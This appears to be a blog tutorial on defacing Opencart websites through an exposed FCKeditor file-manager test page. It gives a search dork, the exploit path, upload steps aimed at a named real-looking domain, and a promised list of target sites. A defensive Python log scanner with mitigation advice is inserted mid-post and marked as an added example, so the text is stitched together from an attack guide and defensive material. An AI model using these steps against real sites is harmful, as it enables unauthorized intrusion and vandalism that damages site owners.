Assalamualaikum, and greetings...
I will show how to deface a website through the FCKeditor exploit.
This method is good for beginners.
Let's start:
Dork: :Powered by Opencart site:.com
:SUPORT BY OPENCART
Exploit: /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Go to google.com and paste the dork.
Once you have a website you want to deface, append the exploit.
Example:
http://www.inputandanalysis.com/
After appending the exploit it looks like this:
http://www.inputandanalysis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Press Enter.
Now follow these steps:
1. Change Connectors from ASP to PHP
2. Click choose file and browse to your .html file
3. Upload the file
You will receive a message "File uploaded with no error"... just press OK.
If you get anything else, switch to another website :D
Now change the test.html in the link
http://www.inputandanalysis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/*test*.html
to
http://www.inputandanalysis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/NameFileKorang.html
Now delete the rest: highlight from connectors back to /admin and delete all of it
http://www.inputandanalysis.com/NameFileKorang.html
Press Enter.
Done.
Example result: http://www.inputandanalysis.com/xWhiteHexor.html
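For a site owner, the requests in this walkthrough stand out in web server access logs. The following is an added example, not part of the original post: it scans Combined Log Format lines for hits on the connectors directory named above. The sample log lines, client IPs and the connector script name in them are constructed assumptions.

```python
import re
from collections import defaultdict

# Combined Log Format: ip - - [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Directory taken from the path in the post; compared in lower case.
CONNECTORS = "/fckeditor/editor/filemanager/connectors/"

def classify(method, path, status):
    """Return a finding label for one request, or None if unrelated."""
    p = path.lower().split("?", 1)[0]
    if CONNECTORS not in p:
        return None
    ok = 200 <= status < 300
    if method == "GET" and p.endswith("/test.html"):
        return "test-page-served" if ok else "test-page-probe"
    if method == "POST":
        return "connector-post-accepted" if ok else "connector-post-rejected"
    return "connector-access"

def scan(lines):
    """Group findings by client IP: {ip: [(timestamp, label, path), ...]}."""
    findings = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        label = classify(m["method"], m["path"], int(m["status"]))
        if label:
            findings[m["ip"]].append((m["ts"], label, m["path"]))
    return dict(findings)

def needs_response(findings):
    """IPs with an accepted POST under the connectors directory."""
    return sorted(ip for ip, hits in findings.items()
                  if any(h[1] == "connector-post-accepted" for h in hits))

BASE = "/admin/view/javascript" + CONNECTORS  # path as given in the post
# Constructed sample lines; IPs are documentation ranges, and the
# "php/connector.php" script name is an assumption for illustration.
SAMPLE = [
    f'203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET {BASE}test.html HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [10/Oct/2024:13:56:02 +0000] "POST {BASE}php/connector.php HTTP/1.1" 200 310',
    f'198.51.100.20 - - [10/Oct/2024:14:01:11 +0000] "GET {BASE}test.html HTTP/1.1" 404 162',
    '192.0.2.5 - - [10/Oct/2024:14:02:40 +0000] "GET /index.php?route=common/home HTTP/1.1" 200 8812',
]
```

An accepted POST under that directory is a reason to check the web root for unexpected files. Removing the editor's file manager test pages and connectors from production, or restricting `/admin` to authenticated users, closes this path.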
List of sites available to deface *(some work, some do not)
1 comment:
All of them are Not Found, bro